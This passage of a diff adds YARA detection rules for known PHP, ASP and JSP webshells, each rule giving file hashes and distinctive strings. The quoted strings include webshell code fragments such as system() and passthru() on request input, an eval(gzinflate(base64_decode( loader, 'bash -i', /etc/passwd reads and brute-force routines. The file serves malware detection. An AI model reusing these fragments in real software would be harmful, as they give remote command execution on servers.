+		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
+		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
+		$s19 = "_|_  O    _    O  _|_" fullword
+		$s20 = "$curcmd = \"ls -lah\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Simple_PHP_backdoor_by_DK {
+	meta:
+		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
+		author = "Florian Roth"
+		hash = "03f6215548ed370bec0332199be7c4f68105274e"
+	strings:
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s8 = "system($cmd);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT {
+	meta:
+		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+		author = "Florian Roth"
+		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
+	strings:
+		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
+		$s12 = "print \"Sending mail to $to....... \"; " fullword
+		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
+	condition:
+		all of them
+}
+rule WebShell_C99madShell_v__2_0_madnet_edition {
+	meta:
+		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+		author = "Florian Roth"
+		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
+	strings:
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"\";  //Pass" fullword
+		$s3 = "$login = \"\"; //Login" fullword
+		$s4 = "//Authentication" fullword
+	condition:
+		all of them
+}
+rule WebShell_CmdAsp_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+		author = "Florian Roth"
+		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
+	strings:
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
+		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
+		$s6 = "' --------------------o0o--------------------" fullword
+		$s8 = "' File: CmdAsp.asp" fullword
+		$s11 = "<-- CmdAsp.asp -->" fullword
+		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+	condition:
+		4 of them
+}
+rule WebShell_NCC_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file NCC-Shell.php"
+		author = "Florian Roth"
+		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
+	strings:
+		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
+		$s1 = "<b>--Coded by Silver" fullword
+		$s2 = "<title>Upload - Shell/Datei</title>" fullword
+		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
+		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
+		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_README {
+	meta:
+		description = "PHP Webshells Github Archive - file README.md"
+		author = "Florian Roth"
+		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
+	strings:
+		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
+		$s1 = "php-webshells" fullword
+	condition:
+		all of them
+}
+rule WebShell_backupsql {
+	meta:
+		description = "PHP Webshells Github Archive - file backupsql.php"
+		author = "Florian Roth"
+		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
+	strings:
+		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
+		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
+		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
+		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
+	condition:
+		2 of them
+}
+rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version {
+	meta:
+		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+		author = "Florian Roth"
+		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
+	strings:
+		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
+		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
+		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_cpanel {
+	meta:
+		description = "PHP Webshells Github Archive - file cpanel.php"
+		author = "Florian Roth"
+		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
+	strings:
+		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
+		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
+		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
+		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
+		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
+		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
+	condition:
+		2 of them
+}
+rule WebShell_accept_language {
+	meta:
+		description = "PHP Webshells Github Archive - file accept_language.php"
+		author = "Florian Roth"
+		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
+	strings:
+		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_529 {
+	meta:
+		description = "PHP Webshells Github Archive - file 529.php"
+		author = "Florian Roth"
+		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
+	strings:
+		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
+		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
+		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
+		$s10 = "This Exploit Was Edited By KingDefacer" fullword
+		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
+		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
+		$s20 = "while($level--) chdir(\"..\"); " fullword
+	condition:
+		2 of them
+}
+rule WebShell_STNC_WebShell_v0_8 {
+	meta:
+		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+		author = "Florian Roth"
+		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
+	strings:
+		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
+		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
+		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_tryag {
+	meta:
+		description = "PHP Webshells Github Archive - file tryag.php"
+		author = "Florian Roth"
+		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
+	strings:
+		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
+		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
+		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
+		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
+		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
+	condition:
+		3 of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
+		author = "Florian Roth"
+		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
+	strings:
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
+		$s13 = "header(\"Content-type: image/gif\");" fullword
+		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_qsd_php_backdoor {
+	meta:
+		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
+		author = "Florian Roth"
+		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
+	strings:
+		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
+		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
+		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
+		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_spygrup {
+	meta:
+		description = "PHP Webshells Github Archive - file spygrup.php"
+		author = "Florian Roth"
+		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
+	strings:
+		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
+		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
+		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
+		$s18 = "By KingDefacer From Spygrup.org>" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Web_shell__c_ShAnKaR {
+	meta:
+		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+		author = "Florian Roth"
+		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
+	strings:
+		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
+		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
+		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
+		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz {
+	meta:
+		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
+		author = "Florian Roth"
+		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
+	strings:
+		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
+		$s11 = "directory... Trust me - it works :-) */" fullword
+		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
+		$s16 = "} else if ($command == 'ls') {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_Gamma_Web_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+		author = "Florian Roth"
+		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+	strings:
+		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
+		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
+		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
+		$s20 = "my $command = $self->query('command');" fullword
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_aspydrv {
+	meta:
+		description = "PHP Webshells Github Archive - file aspydrv.php"
+		author = "Florian Roth"
+		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
+	strings:
+		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
+		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
+		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
+		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
+		$s20 = "' ---Copy Too Folder routine Start" fullword
+	condition:
+		3 of them
+}
+rule WebShell_JspWebshell_1_2_2 {
+	meta:
+		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+		author = "Florian Roth"
+		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
+	strings:
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
+		$s15 = "endPoint=random1.getFilePointer();" fullword
+		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_g00nshell_v1_3 {
+	meta:
+		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+		author = "Florian Roth"
+		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
+	strings:
+		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
+		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
+		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
+		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
+		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
+	condition:
+		2 of them
+}
+rule WebShell_WinX_Shell {
+	meta:
+		description = "PHP Webshells Github Archive - file WinX Shell.php"
+		author = "Florian Roth"
+		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
+	strings:
+		$s4 = "// It's simple shell for all Win OS." fullword
+		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
+		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
+		$s13 = "// Created by greenwood from n57" fullword
+		$s20 = " if (is_uploaded_file($userfile)) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_PHANTASMA {
+	meta:
+		description = "PHP Webshells Github Archive - file PHANTASMA.php"
+		author = "Florian Roth"
+		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
+	strings:
+		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
+		$s15 = "if ($portscan != \"\") {" fullword
+		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
+		$s20 = "$dono = get_current_user( );" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_cw {
+	meta:
+		description = "PHP Webshells Github Archive - file cw.php"
+		author = "Florian Roth"
+		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
+	strings:
+		$s1 = "// Dump Database [pacucci.com]" fullword
+		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
+		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
+		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
+		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
+		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_include_w_shell {
+	meta:
+		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+		author = "Florian Roth"
+		hash = "1a7f4868691410830ad954360950e37c582b0292"
+	strings:
+		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
+		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
+		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
+	condition:
+		1 of them
+}
+rule WebShell_mysql_tool {
+	meta:
+		description = "PHP Webshells Github Archive - file mysql_tool.php"
+		author = "Florian Roth"
+		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
+	strings:
+		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
+		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_PhpSpy_Ver_2006 {
+	meta:
+		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+		author = "Florian Roth"
+		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
+	strings:
+		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
+		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
+		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
+	condition:
+		1 of them
+}
+rule WebShell_ZyklonShell {
+	meta:
+		description = "PHP Webshells Github Archive - file ZyklonShell.php"
+		author = "Florian Roth"
+		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
+	strings:
+		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
+		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
+		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
+		$s3 = "<H1>Not Found</H1>" fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_myshell {
+	meta:
+		description = "PHP Webshells Github Archive - file myshell.php"
+		author = "Florian Roth"
+		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
+	strings:
+		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
+		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
+		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_lolipop {
+	meta:
+		description = "PHP Webshells Github Archive - file lolipop.php"
+		author = "Florian Roth"
+		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
+	strings:
+		$s3 = "$commander = $_POST['commander']; " fullword
+		$s9 = "$sourcego = $_POST['sourcego']; " fullword
+		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
+	condition:
+		all of them
+}
+rule WebShell_simple_cmd {
+	meta:
+		description = "PHP Webshells Github Archive - file simple_cmd.php"
+		author = "Florian Roth"
+		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
+	strings:
+		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s2 = "<title>G-Security Webshell</title>" fullword
+		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_go_shell {
+	meta:
+		description = "PHP Webshells Github Archive - file go-shell.php"
+		author = "Florian Roth"
+		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
+	strings:
+		$s0 = "#change this password; for power security - delete this file =)" fullword
+		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
+		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
+		$s12 = "print << \"[kalabanga]\";" fullword
+		$s13 = "<title>GO.cgi</title>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_aZRaiLPhp_v1_0 {
+	meta:
+		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth"
+		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
+	strings:
+		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
+		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
+		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
+		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
+	condition:
+		2 of them
+}
+rule WebShell_webshells_zehir4 {
+	meta:
+		description = "Webshells Github Archive - file zehir4"
+		author = "Florian Roth"
+		hash = "788928ae87551f286d189e163e55410acbb90a64"
+		score = 55
+	strings:
+		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
+		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
+	condition:
+		1 of them
+}
+rule WebShell_zehir4_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
+		author = "Florian Roth"
+		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
+	strings:
+		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
+		$s11 = "frames.byZehir.document.execCommand("
+		$s15 = "frames.byZehir.document.execCommand(co"
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_lostDC {
+	meta:
+		description = "PHP Webshells Github Archive - file lostDC.php"
+		author = "Florian Roth"
+		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
+	strings:
+		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
+		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
+		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
+		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
+		$s12 = "$ret = shellexec($command);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_CasuS_1_5 {
+	meta:
+		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
+		author = "Florian Roth"
+		hash = "7eee8882ad9b940407acc0146db018c302696341"
+	strings:
+		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
+		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
+		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
+	condition:
+		1 of them
+}
+rule WebShell_ftpsearch {
+	meta:
+		description = "PHP Webshells Github Archive - file ftpsearch.php"
+		author = "Florian Roth"
+		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
+	strings:
+		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
+		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
+		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
+		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ {
+	meta:
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+	strings:
+		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
+		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
+		$s11 = " *   Coded by Pixcher" fullword
+		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah {
+	meta:
+		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
+		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
+		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
+	strings:
+		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
+		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
+		$s3 = "$dt = $_POST['filecontent'];" fullword
+		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
+		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
+		$s11 = "document.cmdform.command.value='';" fullword
+		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
+	condition:
+		3 of them
+}
+rule WebShell_Generic_PHP_7 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
+		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
+		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
+		hash3 = "715f17e286416724e90113feab914c707a26d456"
+	strings:
+		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
+		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
+		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
+		$s4 = "if( $action == \"dumpTable\" )" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall {
+	meta:
+		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
+		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
+		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
+		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
+	strings:
+		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
+		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
+		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
+		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_8 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
+		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
+		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
+	strings:
+		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
+		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s3 = "/* I added this to ensure the script will run correctly..." fullword
+		$s14 = "<!--    </form>   -->" fullword
+		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
+		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
+	condition:
+		3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
+	strings:
+		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
+		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
+		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
+		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_9 {
+	meta:
+		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
+		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
+		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
+	strings:
+		$s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword
+		$s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword
+		$s12 = "if (!empty($_POST['c'])){" fullword
+		$s13 = "passthru($_POST['c']);" fullword
+		$s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword
+		$s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword
+	condition:
+		3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv {
+	meta:
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
